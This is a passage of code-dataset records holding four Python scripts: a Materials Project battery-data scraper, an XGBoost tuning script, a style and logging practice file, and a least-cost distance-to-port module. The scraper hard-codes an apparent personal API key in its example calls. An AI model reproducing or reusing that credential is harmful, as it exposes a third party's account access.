"numpy.sum", "line_number": 59, "usage_type": "call"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ndindex", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.register_cmap", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "258105633", "text": "#!/usr/bin/python\n\nimport requests\nfrom pandas import DataFrame\n\n\ndef scrape_batteries(working_ion, filter_property=\"average_voltage\"):\n print(\"Scraping batteries from battery-explorer\")\n print(\"Working ion: {}\".format(working_ion))\n print(\"Filtering property: {}\".format(filter_property))\n\n batteries = {}\n\n # Scrape over the full range of average voltage in the materials database\n for i in range(0, 150):\n url = 'https://www.materialsproject.org/batteries/search?query={{\"working_ion\":{{\"$in\":[\"{ion}\"]}},\"average_voltage\":{{\"$gte\":{0},\"$lte\":{1}}}}}' \\\n .format(-2.1 + i / 10.0, -1.9 + i / 10.0, ion=working_ion, property=filter_property)\n\n response = requests.get(url)\n response_batteries_list = response.json()\n\n assert response.status_code == 200\n assert isinstance(response_batteries_list, list)\n assert not isinstance(response_batteries_list, dict)\n\n for battery in response_batteries_list:\n batteries[battery[\"battid\"]] = battery\n\n print('Found {} batteries and {} unique batteries so far. Searches run: {}' \\\n .format(len(batteries), len(set(batteries)), i))\n\n return batteries\n\n\ndef fetch_battery_from_api(battery, apikey):\n print(\"Scraping battery {}\".format(battery[\"battid\"]))\n\n api_key_header = {\"X-API-KEY\": apikey}\n url = \"https://www.materialsproject.org/rest/v2/battery/{}\".format(battery[\"battid\"])\n battery_get = requests.get(url, headers=api_key_header)\n response_obj = battery_get.json()\n\n assert battery_get.status_code == 200\n assert response_obj[\"valid_response\"] == True\n\n battery_data = response_obj[\"response\"][0]\n\n if len(battery_data[\"adj_pairs\"]) > 2:\n print(\"Found a battery with too many materials, write code to handle it. {} material pairs found.\"\n .format(len(battery_data[\"adj_pairs\"])))\n return None\n\n return (battery_data[\"battid\"], battery_data)\n\n\ndef compose_battery_data(battery):\n print(battery)\n return [battery[\"battid\"],\n battery[\"adj_pairs\"][0]['id_discharge'],\n battery[\"adj_pairs\"][0]['id_charge'],\n battery['reduced_cell_formula'],\n battery['type'],\n #battery['spacegroup']['symbol'],\n battery['average_voltage'],\n battery['capacity_grav'],\n battery['capacity_vol'],\n battery['energy_grav'],\n battery['energy_vol'],\n battery[\"adj_pairs\"][0]['stability_charge'],\n battery[\"adj_pairs\"][0]['stability_discharge']]\n\n\n\ndef scrape_battery_data_to_csv(working_ion, output_filename, apikey):\n print(\"Fetching batteries from Materials Project\")\n\n batteries_list = scrape_batteries(working_ion=working_ion)\n\n print(\"Found {} batteries with working ion {}\".format(len(batteries_list.values()), working_ion))\n\n battery_materials = dict(filter(\n lambda element: element != None,\n [fetch_battery_from_api(battery, apikey) for battery in batteries_list.values()]))\n\n print(\"Fetched {} battery data objects from rest api\".format(len(battery_materials.values())))\n\n data_columns = ['Battid',\n 'Discharged_ID',\n 'Charged_ID',\n 'Reduced_Cell_Formula',\n 'Type',\n #'Spacegroup',\n 'Average_Voltage',\n 'Capacity_Grav',\n 'Capacity_Vol',\n 'Specific_E_Wh/kg',\n 'E Density Wh/l',\n 'Stability Charge',\n 'Stability Discharge']\n\n battery_data = [compose_battery_data(battery) for battery in list(battery_materials.values())]\n\n df = DataFrame.from_records(battery_data, columns=data_columns)\n\n print(\"Exporting selected battery data to file: {}\".format(output_filename))\n df.to_csv(output_filename, index=False)\n\n\n# Example for scraping all Mg-batteries and exporting them to mg_batteries.csv\n#scrape_battery_data_to_csv(\"Mg\", \"mg_batteries.csv\", \"GKDHNwKre8uiowqhPh\")\n# atomtypes = ['Y','Na','Al','Zn'] \n\n# for i in atomtypes:\n# filename = i + '_batteries.csv'\n# print('i: ', i )\n# print('Filename: ', filename)\n# scrape_battery_data_to_csv(i, filename, \"GKDHNwKre8uiowqhPh\")\n\n \n\nscrape_battery_data_to_csv(\"Mg\", \"Mg_batteries.csv\", \"GKDHNwKre8uiowqhPh\")\n\n\n\n\n\n", "sub_path": "0_mp_battery_scrape.py", "file_name": "0_mp_battery_scrape.py", "file_ext": "py", "file_size_in_byte": 4379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "38799783", "text": "from custom.model_development import display_results, getstats_fromstream\nfrom custom.model_development import load_datasets, make_datasets\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pathlib import Path\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score, precision_score\nfrom sklearn.metrics import recall_score, make_scorer\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.model_selection import RepeatedStratifiedKFold, train_test_split\nimport xgboost as xgb\nfrom xgboost.sklearn import XGBClassifier\n\n#set types and number of examples from each class in each set\nset_types = ['training', 'test']\nnum_ex = [260, 64]\ndatasets_dict = dict(zip(set_types, num_ex))\n\nclass_names = ['empty', 'cloud']\nseed = 52\n\nparams_file = Path('/home/bob/development/experiment_data/2018/'\n 'cloudparams_s20.csv')\n\ndir_training_images = ('/home/bob/development/atomic_cloud_training_data/'\n 'training_data')\n\npath_images_left = Path(dir_training_images, 'left_clouds/seed_13')\npath_images_right = Path(dir_training_images, 'right_clouds/seed_31')\n\ndir_model_main = ('/home/bob/development/ml_algorithms/atomic_cloud/'\n 'gbc_binary_classify/models')\n\npath_model_id = Path(dir_model_main, f'num_ex_{num_ex[0]}_seed_{seed}')\n\n#Tune using training set of left-side clouds.\nmake_datasets(class_names, datasets_dict, path_images_left, path_model_id, seed)\n\nX_L, X_test_L, y_L, y_test_L = load_datasets(path_model_id,\n path_images_left)\n\n_, scale_L, _ = getstats_fromstream(path_model_id, path_images_left)\nscale_rnd_L = np.around(scale_L)\nX_scl_L = X_L / scale_rnd_L\nX_test_scl_L = X_test_L / scale_rnd_L\n\nX_train_scl_L, X_eval_scl_L, y_train_L, y_eval_L = train_test_split(\n X_scl_L, y_L, train_size=0.8, random_state=123)\n\n#Tune using training set of right-side clouds.\n#make_datasets(class_names, datasets_dict, path_images_right, path_model_id, seed)\n#\n#X_R, X_test_R, y_train_R, y_R = load_datasets(path_model_id,\n# path_images_right)\n#\n#_, scale_R, _ = getstats_fromstream(path_model_id, path_images_right)\n#scale_rnd_R = np.around(scale_R)\n#X_scl_R = X_R / scale_rnd_R\n#X_test_scl_R = X_test_R / scale_rnd_R\n\n#Tuning stages.\n\n#Stage 1 - Search for learning_rate\n#var_params = {'colsample_bytree': 0.15,\n# 'gamma': 0,\n# 'max_depth': 10,\n# 'min_child_weight': 3,\n# 'reg_alpha': 0,\n# 'reg_lambda': 0,\n# 'subsample': 1}\n#learning_rates = [0.0001, 0.001, 0.01, 0.1, 1]\n#params_grid = [{'learning_rate': learning_rates}]\n\n#Stage 2 - Search for max_depth and min_child_weight.\n#var_params = {'colsample_bytree': 0.15,\n# 'gamma': 0,\n# 'learning_rate': 0.001,\n# 'reg_alpha': 0,\n# 'reg_lambda': 0,\n# 'subsample': 1}\n##max_depth = [3, 7, 11, 15, 19, 24]\n##min_child_weight = [1, 3, 5, 7, 9]\n#max_depth = [5, 20, 50, 75, 100]\n#min_child_weight = [3, 10, 20, 30]\n#params_grid = [{'max_depth': max_depth,\n# 'min_child_weight': min_child_weight}]\n#param_dists = params_grid\n#n_iter = 18\n\n#Stage 3 - Search for colsample_bytree and subsample.\n#var_params = {'gamma': 0,\n# 'learning_rate': 0.001,\n# 'max_depth': 9,\n# 'min_child_weight': 5,\n# 'reg_alpha': 0,\n# 'reg_lambda': 0}\n#colsample_bytree = [0.02, 0.05, 0.1, 0.2, 0.5]\n#colsample_bytree = [i/10 + 0.05 for i in range(1, 5)]\n#subsample = [i / 10 for i in range(2, 11, 2)]\n#params_grid = [{'colsample_bytree': colsample_bytree,\n# 'subsample': subsample}]\n#param_dists = params_grid\n#n_iter = 25\n\n#Stage 4 - Search for gamma, reg_alpha and reg_lambda.\n#var_params = {'colsample_bytree': 0.35,\n# 'learning_rate': 0.001,\n# 'max_depth': 9,\n# 'min_child_weight': 5,\n# 'subsample': 0.4}\n#gamma = [0.001, 0.01, 0.1, 1, 10]\n#reg_alpha = [0.001, 0.01, 0.1, 1, 10]\n#reg_lambda = [0.001, 0.01, 0.1, 1, 10]\n#gamma = [0.01, 0.1, 1]\n#reg_alpha = [10, 100, 1000]\n#reg_lambda = [10, 100, 1000]\n#params_grid = [{'gamma': gamma, 'reg_alpha': reg_alpha, 'reg_lambda': [0]},\n# {'gamma': gamma, 'reg_alpha': [0], 'reg_lambda': reg_lambda}]\n#gamma = [0.1]\n#reg_lambda = [i * 10 for i in range(1, 11)]\n#params_grid = [{'gamma': gamma, 'reg_alpha': [0], 'reg_lambda': reg_lambda}]\n#param_dists = params_grid\n#n_iter = 25\n\n#Stage 5 - Check learning_rate again.\nvar_params = {'colsample_bytree': 0.35,\n 'gamma': 0.1,\n 'max_depth': 9,\n 'min_child_weight': 5,\n 'reg_alpha': 0,\n 'reg_lambda': 100,\n 'subsample': 0.4}\nlearning_rates = [i / 10000 for i in range(5, 16)]\nparams_grid = [{'learning_rate': learning_rates}]\n\nearly_stopping_rounds = 20\neval_set = [(X_eval_scl_L, y_eval_L)]\nfixed_params = {'n_estimators': 500,\n 'random_state': 10,\n 'verbosity': 0}\n\nestimator = XGBClassifier(**fixed_params, **var_params)\n\ncrossval = RepeatedStratifiedKFold(n_splits=6, n_repeats=3, random_state=3)\n\nmy_prec_scorer = make_scorer(precision_score, pos_label=class_names[0])\nmy_recall_scorer = make_scorer(recall_score, pos_label=class_names[0])\n\nmetrics = {'accuracy': make_scorer(accuracy_score),\n 'precision': my_prec_scorer,\n 'recall': my_recall_scorer}\n\nprint(f'# Tuning hyper-parameters')\nprint()\n\nsearch_params = {'estimator': estimator,\n 'cv': crossval,\n 'scoring': metrics,\n 'refit': False}\n\nmodel_search = GridSearchCV(**search_params,\n param_grid=params_grid)\n\n#model_search = RandomizedSearchCV(**search_params,\n# param_distributions=param_dists,\n# n_iter=n_iter)\n\n#Fit model with left-side clouds.\nmodel_search.fit(X_train_scl_L, y_train_L, eval_set=eval_set,\n eval_metric='auc', early_stopping_rounds=20,\n verbose=False)\n\n#Fit model with right-side clouds.\n#model_search.fit(X_train_scl_R, y_train_R, eval_set=eval_set,\n# eval_metric='auc', early_stopping_rounds=20,\n# verbose=False)\n\n#print(\"Grid scores by metric on development set:\")\n#print()\n\nresults = model_search.cv_results_\ndisplay_results(results, metrics)\n\n# Run this to check performance on the test set.\n#model_L_params = {'colsample_bytree': 0.35,\n# 'gamma': 0.1,\n# 'learning_rate': 0.001,\n# 'max_depth': 9,\n# 'min_child_weight': 5,\n# 'n_estimators': 500,\n# 'random_state': 10,\n# 'reg_alpha': 0,\n# 'reg_lambda': 100,\n# 'subsample': 0.4,\n# 'random_state': 10,\n# 'verbosity': 0}\n#model_L = XGBClassifier(**model_L_params)\n#model_L.fit(X_train_scl_L, y_train_L, eval_set=eval_set,\n# eval_metric='auc', early_stopping_rounds=20,\n# verbose=False)\n#print(\"Detailed classification report:\")\n#print()\n#y_true, y_pred = y_test_L, model_search.predict(X_test_scl_L)\n#print(classification_report(y_true, y_pred))\n#print()\n", "sub_path": "tune_gbc_model.py", "file_name": "tune_gbc_model.py", "file_ext": "py", "file_size_in_byte": 7354, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 29, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "custom.model_development.make_datasets", "line_number": 37, "usage_type": "call"}, {"api_name": "custom.model_development.load_datasets", "line_number": 39, "usage_type": "call"}, {"api_name": "custom.model_development.getstats_fromstream", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 47, "usage_type": "call"}, {"api_name": "xgboost.sklearn.XGBClassifier", "line_number": 142, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RepeatedStratifiedKFold", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 146, "usage_type": "argument"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 147, "usage_type": "argument"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 149, "usage_type": "argument"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 161, "usage_type": "call"}, {"api_name": "custom.model_development.display_results", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "455730397", "text": "\"\"\"\n#1. whitespace before '('\ndef f ():\n print(\"Hello\")\nf()\n\n#2. missing whitespace arount operator\nprint(5+ 4)\n\n#3. missing whitespace after ','\nprint([2,3,4])\n\n#4. unexpected spaces around keyword / parameter equals\ndef f(arg=0):\n return 2**arg\nf(arg = 2)\n\n#5. expected 2 blank lines, found 1\ndef f1():\n return \"Hello\"\n\ndef f2():\n return \"World\"\n\n#6. multiple statements on one line (color)\nif True: print(\"hello\")\n\n#7. multiple statements on one line (semicolon)\nprint(\"hello\"); print(\"world\")\n\n#8. comparison to None should be 'if cond is None:'\ndef f(x):\n if x % 2 == 0:\n return True\n\nr = f(x)\n\nif r == None:\n print(\"odd\")\n\n#9. comparison to True should be 'if cond is True:' or 'if cond:'\ndef f(x):\n if x % 2 == 0:\n return True\n\nr = f(x)\n\nif r == True:\n print(\"even\")\n\n\"\"\"\nfrom printermodule import *\n\ntry:\n\thello() # hello\n\tworld() # world\nexcept:\n\tpass \n\nimport helloworldpkg.hello\nimport helloworldpkg.world\n\nhelloworldpkg.hello.printh()\nhelloworldpkg.world.printw()\n\nimport logging\nimport traceback\n\nlogging.basicConfig(filename='logfile.log', filemode='w', level=logging.INFO)\nlogging.raiseExceptions = True\n\ndef div(a, b):\n\ttry:\n\t\treturn a/b, None\n\texcept Exception as e:\n\t\treturn e, traceback.format_exc()\n\ndef run_with_log(func, a, b):\n\tout, trace = div(a,b)\n\tif trace is not None:\n\t\treturn logging.exception(f'{out}\\n{trace}')\n\nrun_with_log(div, 6, 3)\nrun_with_log(div, 6, 0)\nrun_with_log(div, \"5\", 2)", "sub_path": "prac3.py", "file_name": "prac3.py", "file_ext": "py", "file_size_in_byte": 1454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "helloworldpkg.hello.hello.printh", "line_number": 63, "usage_type": "call"}, {"api_name": "helloworldpkg.hello.hello", "line_number": 63, "usage_type": "attribute"}, {"api_name": "helloworldpkg.hello", "line_number": 63, "usage_type": "name"}, {"api_name": "helloworldpkg.hello.world.printw", "line_number": 64, "usage_type": "call"}, {"api_name": "helloworldpkg.hello.world", "line_number": 64, "usage_type": "attribute"}, {"api_name": "helloworldpkg.hello", "line_number": 64, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.raiseExceptions", "line_number": 70, "usage_type": "attribute"}, {"api_name": "traceback.format_exc", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "538238280", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCompute least-cost distance to port\n\"\"\"\nfrom concurrent.futures import as_completed\nimport geopandas as gpd\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.spatial import cKDTree\nfrom skimage.graph import MCP_Geometric\nimport time\nfrom warnings import warn\n\nfrom reV.handlers.exclusions import ExclusionLayers\nfrom reVX.utilities import ExclusionsConverter\nfrom reVX.utilities.utilities import log_versions, coordinate_distance\nfrom rex.utilities.execution import SpawnProcessPool\nfrom rex.utilities.loggers import log_mem\nfrom rex.utilities.utilities import (check_res_file, get_lat_lon_cols,\n parse_table, row_col_indices)\n\nlogger = logging.getLogger(__name__)\n\n\nclass DistanceToPorts:\n \"\"\"\n Class to compute the least cost distance from offshore pixels to port\n locations. The distance to coast exclusion layer will be used to calculate\n least cost paths around land masses and other such obstructions. Produces\n the least cost distance from each offshore pixel to the nearest port. If\n a distance to port layer already exists it can be updated with the least\n cost distance to new ports.\n\n NOTE: Computing the least cost distance is both memory and computationally\n intensive! One EAGLE a bigmem node was needed to run in parallel and a\n medium (178GB) memory node is needed to run in serial.\n \"\"\"\n def __init__(self, ports, excl_fpath, input_dist_layer='dist_to_coast'):\n \"\"\"\n Parameters\n ----------\n ports : str\n Path to shape, csv, or json file containing ports to compute\n least cost distance to\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer\n input_dist_layer : str, optional\n Exclusions layer name with distance to coast,\n by default 'dist_to_coast'\n \"\"\"\n log_versions(logger)\n self._input_dist_layer = input_dist_layer\n self._ports_fpath = ports\n self._ports, self._cost_arr, self._profile = self._parse_ports(\n ports, excl_fpath, input_dist_layer=input_dist_layer)\n log_mem(logger)\n\n def __repr__(self):\n msg = \"{} from {}\".format(self.__class__.__name__, self.ports)\n\n return msg\n\n @property\n def ports(self):\n \"\"\"\n DataFrame of port locations\n\n Returns\n -------\n DataFrame\n \"\"\"\n return self._ports\n\n @property\n def cost_arr(self):\n \"\"\"\n Cost array, used to compute least cost distance to ports\n Offshore pixels have a value of 90 (pixel size), onshore pixels have a\n value of -1\n\n Returns\n -------\n ndarray\n \"\"\"\n return self._cost_arr\n\n @classmethod\n def _parse_lat_lons(cls, excl_fpath, input_dist_layer='dist_to_coast'):\n \"\"\"\n Parse cost array, profile, and latitude and longitude coordinates\n\n Parameters\n ----------\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer\n input_dist_layer : str, optional\n Exclusions layer name with distance to coast values,\n by default 'dist_to_coast'\n\n Returns\n -------\n lat_lon : pandas.DataFrame\n Table mapping the offshore pixel coordiantes (lat, lon) to thier\n position (row, col) within the distance to shore array/layer/raster\n cost_arr : ndarray\n Cost array with offshore pixels set to 90 (pixel width) and\n onshore pixels set to -1.\n profile : dict\n Profile (transform, crs, etc.) of arr raster\n \"\"\"\n hsds = check_res_file(excl_fpath)[1]\n with ExclusionLayers(excl_fpath, hsds=hsds) as tif:\n profile = tif.profile\n cost_arr = tif[input_dist_layer]\n lat = tif['latitude'].astype(np.float32)\n lon = tif['longitude'].astype(np.float32)\n\n mask = cost_arr > 0\n cost_arr = np.where(mask, 90, -1).astype(np.int8)\n\n mask = mask.ravel()\n ids = np.arange(lat.size, dtype=np.uint32)[mask]\n row_len = lat.shape[1]\n lat = lat.ravel()[mask]\n lon = lon.ravel()[mask]\n del mask\n\n rows, cols = row_col_indices(ids, row_len)\n del ids\n del row_len\n\n lat_lon = pd.DataFrame({'latitude': lat,\n 'longitude': lon,\n 'row': rows,\n 'col': cols})\n\n return lat_lon, cost_arr, profile\n\n @staticmethod\n def _check_ports_coords(port_coords, lat_lon):\n \"\"\"\n Check port coordinates to make sure they are within the resource domain\n\n Parameters\n ----------\n port_coords : ndarray\n nx2 array of (lat, lon) port coordinates\n lat_lon : ndarray\n nx2 array of (lat, lon) offshore coordinates\n\n Returns\n -------\n check : ndarray\n Boolean array indicating which ports are outside (False) the\n resource domain.\n \"\"\"\n lat_min, lat_max = np.sort(lat_lon[:, 0])[[0, -1]]\n lon_min, lon_max = np.sort(lat_lon[:, 1])[[0, -1]]\n\n lat = port_coords[:, 0]\n check = lat < lat_min\n check |= lat > lat_max\n\n lon = port_coords[:, 1]\n check |= lon < lon_min\n check |= lon > lon_max\n\n if any(check):\n bad_coords = port_coords[check]\n msg = (\"Ports with coordinates ({}) are outsides of the \"\n \"resource domain: (({}, {}), ({}, {})) and will not be used\"\n \" to to compute the least cost distance!\"\n .format(bad_coords, lat_min, lon_min, lat_max, lon_max))\n logger.warning(msg)\n warn(msg)\n\n return ~check\n\n @staticmethod\n def _create_port_names(ports):\n \"\"\"\n Create port names from \"PORT_NAME\" and \"STATE\", confirm all names are\n unique\n\n Parameters\n ----------\n ports : geopandas.GeoDataFrame | pandas.DataFrame\n DataFrame of port locations and their mapping to the offshore\n pixels for least cost distance computation\n\n Returns\n -------\n ports : geopandas.GeoDataFrame | pandas.DataFrame\n DataFrame of port locations and their mapping to the offshore\n pixels for least cost distance computation which a unique port\n name added\n \"\"\"\n name = None\n state = None\n for c in ports.columns:\n if c.lower() == 'port_name':\n if name is not None:\n msg = ('Multiple potential \"port names\" were found: '\n '({}, {})!'.format(name, c))\n logger.error(msg)\n raise RuntimeError(msg)\n else:\n name = c.lower()\n\n if 'state' in c.lower():\n if state is not None:\n msg = ('Multiple potential \"states\" were found: '\n '({}, {})!'.format(state, c))\n logger.error(msg)\n raise RuntimeError(msg)\n\n if state is not None and name is not None:\n break\n\n ports['name'] = (ports['PORT_NAME'].astype(str) + '_'\n + ports['ps_STATE'].astype(str))\n counts = ports['name'].value_counts()\n if np.any(counts > 1):\n msg = ('Ports must have unique names! The following duplicate '\n 'names were provided: {}'.format(counts[counts > 1]))\n logger.error(msg)\n raise RuntimeError(msg)\n\n return ports\n\n @classmethod\n def _parse_ports(cls, ports, excl_fpath, input_dist_layer='dist_to_coast'):\n \"\"\"\n Load ports for disc. Can be provided as a shape, csv, or json file.\n In all cases the ports latitude and longitude coordinates must be\n provided. Map the ports locations to the nearest offshore pixel in the\n distance to coast layer/array/raster. Compute the distance from the\n ports actual position to the nearest offshore pixel.\n\n Parameters\n ----------\n ports : str\n Path to shape, csv, or json file containing ports to compute\n least cost distance to\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer\n input_dist_layer : str, optional\n Exclusions layer name with distance to coast values,\n by default 'dist_to_coast'\n\n Returns\n -------\n ports : geopandas.GeoDataFrame | pandas.DataFrame\n DataFrame of port locations and their mapping to the offshore\n pixels for least cost distance computation\n cost_arr : ndarray\n Cost array with offshore pixels set to 90 (pixel width) and\n onshore pixels set to -1.\n profile : dict\n Profile (transform, crs, etc.) of arr raster\n \"\"\"\n if ports.endswith('.shp'):\n ports = gpd.read_file(ports, ignore_geometry=True)\n else:\n ports = parse_table(ports)\n\n pixels, cost_arr, profile = \\\n cls._parse_lat_lons(excl_fpath, input_dist_layer=input_dist_layer)\n lat_lon_cols = get_lat_lon_cols(pixels)\n pixel_coords = pixels[lat_lon_cols].values\n\n tree = cKDTree(pixel_coords) # pylint: disable=not-callable\n\n lat_lon_cols = get_lat_lon_cols(ports)\n port_coords = ports[lat_lon_cols].values.astype('float32')\n # remove ports that are outside pixel bounds\n mask = cls._check_ports_coords(port_coords, pixel_coords)\n port_coords = port_coords[mask]\n ports = ports.loc[mask]\n _, idx = tree.query(port_coords)\n\n pixels = pixels.iloc[idx]\n pixel_coords = pixel_coords[idx]\n\n ports['row'] = pixels['row'].values\n ports['col'] = pixels['col'].values\n ports['dist_to_pixel'] = coordinate_distance(port_coords, pixel_coords)\n\n ports = cls._create_port_names(ports)\n\n return ports, cost_arr, profile\n\n @classmethod\n def lc_dist_to_port(cls, cost_arr, port_idx, port_dist,\n geotiff=None, profile=None):\n \"\"\"\n Compute the least cost dist from the port coordinates to all\n offshore coordinates in km\n\n Parameters\n ----------\n cost_arr : ndarray\n Cost array with offshore pixels set to 90 (pixel width) and\n onshore pixels set to -1.\n port_idx : list | tuple | ndarray\n Port (row, col) index, used as starting point for least cost\n distance\n port_dist : float\n Distance from port to pixel that corresponds to port_idx in meters\n geotiff : str, optional\n Output geotiff file path to save least cost distance to ports,\n by default None\n profile : dict, optional\n Profile (transform, crs, etc.) of cost array raster, needed to\n write distance to ports array to geotiff, by default None\n\n Returns\n -------\n lc_dist : ndarray, optional\n Least cost distance from port to all offshore pixels in km\n \"\"\"\n try:\n ts = time.time()\n logger.debug('Port that is {:.4f} km from nearest offshore pixel '\n '{}.'.format(port_dist, port_idx))\n if not isinstance(port_idx, np.ndarray):\n port_idx = np.array(port_idx)\n\n if len(port_idx) == 2:\n port_idx = np.expand_dims(port_idx, 0)\n\n mcp = MCP_Geometric(cost_arr)\n lc_dist = mcp.find_costs(starts=port_idx)[0].astype('float32')\n lc_dist /= 1000\n lc_dist += port_dist\n\n lc_dist[cost_arr == -1] = -1\n\n tt = (time.time() - ts) / 60\n logger.debug('- Least cost distance computed in {:.4f} minutes'\n .format(tt))\n if geotiff is not None:\n logger.debug('Saving least cost distance to port to '\n f'{geotiff}')\n msg = ('Profile is needed to write least cost distance to '\n 'ports to {}!'.format(geotiff))\n assert profile is not None, msg\n ExclusionsConverter.write_geotiff(geotiff, profile, lc_dist)\n else:\n return lc_dist\n except Exception:\n logger.exception('- Error computing least cost distance to port!')\n\n def distance_to_ports(self, out_dir, max_workers=1, replace=False):\n \"\"\"\n Compute the least cost distance from each offshore pixel to the nearest\n port in km\n\n Parameters\n ----------\n out_dir : str\n Directory to save distance to port geotiffs too.\n max_workers : int, optional\n Number of workers to use for setback computation, if 1 run in\n serial, if > 1 run in parallel with that many workers, if None\n run in parallel on all available cores, by default 1\n replace : bool, optional\n Flag to replace existing ports geotiffs, by default False\n \"\"\"\n if max_workers is None:\n max_workers = os.cpu_count()\n\n f_name = name = os.path.basename(self._ports_fpath).split('.')[0]\n if max_workers > 1:\n logger.info('Computing least cost distance to ports in parallel '\n 'using {} workers'.format(max_workers))\n loggers = [__name__, 'reVX']\n with SpawnProcessPool(max_workers=max_workers,\n loggers=loggers) as exe:\n futures = []\n for _, port in self.ports.iterrows():\n name = port['name'].replace(' ', '_')\n geotiff = '{}-{}.tif'.format(f_name, name)\n geotiff = os.path.join(out_dir, geotiff)\n if os.path.exists(geotiff) and not replace:\n msg = ('{} already exists and will be skipped! To '\n 'replace it set \"replace=True\"'\n .format(geotiff))\n logger.warning(msg)\n warn(msg)\n else:\n logger.debug('Computing least cost distance to {}'\n .format(name))\n port_idx = port[['row', 'col']].values\n port_dist = port['dist_to_pixel']\n future = exe.submit(\n self.lc_dist_to_port, self.cost_arr,\n port_idx, port_dist, geotiff=geotiff,\n profile=self._profile)\n futures.append(future)\n\n for i, future in enumerate(as_completed(futures)):\n logger.debug('Computed least cost distance for {} of {} '\n 'ports'.format((i + 1), len(futures)))\n log_mem(logger)\n else:\n logger.info('Computing least cost distance to ports in serial')\n for i, port in self.ports.iterrows():\n name = port['name'].replace(' ', '_')\n geotiff = '{}-{}.tif'.format(f_name, name)\n geotiff = os.path.join(out_dir, geotiff)\n if os.path.exists(geotiff) and not replace:\n msg = ('{} already exists and will be skipped! To '\n 'replace it set \"replace=True\"'\n .format(geotiff))\n logger.warning(msg)\n warn(msg)\n else:\n logger.debug('Computing least cost distance to {}'\n .format(name))\n port_idx = port[['row', 'col']].values\n port_dist = port['dist_to_pixel']\n self.lc_dist_to_port(\n self.cost_arr, port_idx, port_dist, geotiff=geotiff,\n profile=self._profile)\n logger.debug('Computed least cost distance for {} of {} '\n 'ports'.format((i + 1), len(self.ports)))\n log_mem(logger)\n\n @classmethod\n def run(cls, ports, excl_fpath, out_dir, input_dist_layer='dist_to_coast',\n max_workers=1, replace=False):\n \"\"\"\n Compute the least cost distance from offshore pixels to port\n locations in km. The distance to coast exclusion layer will be used to\n calculate least cost paths around land masses and other such\n obstructions. Produces the least cost distance from each offshore\n pixel to the nearest port. If a distance to port layer already exists\n it can be updated with the least cost distance to new ports.\n\n Parameters\n ----------\n ports : str\n Path to shape, csv, or json file containing ports to compute\n least cost distance to\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer. Will also\n be the file into which the least cost distance to port is saved.\n out_dir : str\n Directory to save distance to port geotiffs too.\n input_dist_layer : str, optional\n Exclusions layer with distance to coast values,\n by default 'dist_to_coast'\n max_workers : int, optional\n Number of workers to use for setback computation, if 1 run in\n serial, if > 1 run in parallel with that many workers, if None\n run in parallel on all available cores, by default 1\n replace : bool, optional\n Flag to replace existing ports geotiffs, by default False\n \"\"\"\n logger.info('Computing least cost distance to ports in {}'\n .format(ports))\n dtp = cls(ports, excl_fpath, input_dist_layer=input_dist_layer)\n\n dtp.distance_to_ports(out_dir, max_workers=max_workers,\n replace=replace)\n", "sub_path": "reVX/offshore/dist_to_ports.py", "file_name": "dist_to_ports.py", "file_ext": "py", "file_size_in_byte": 18228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", 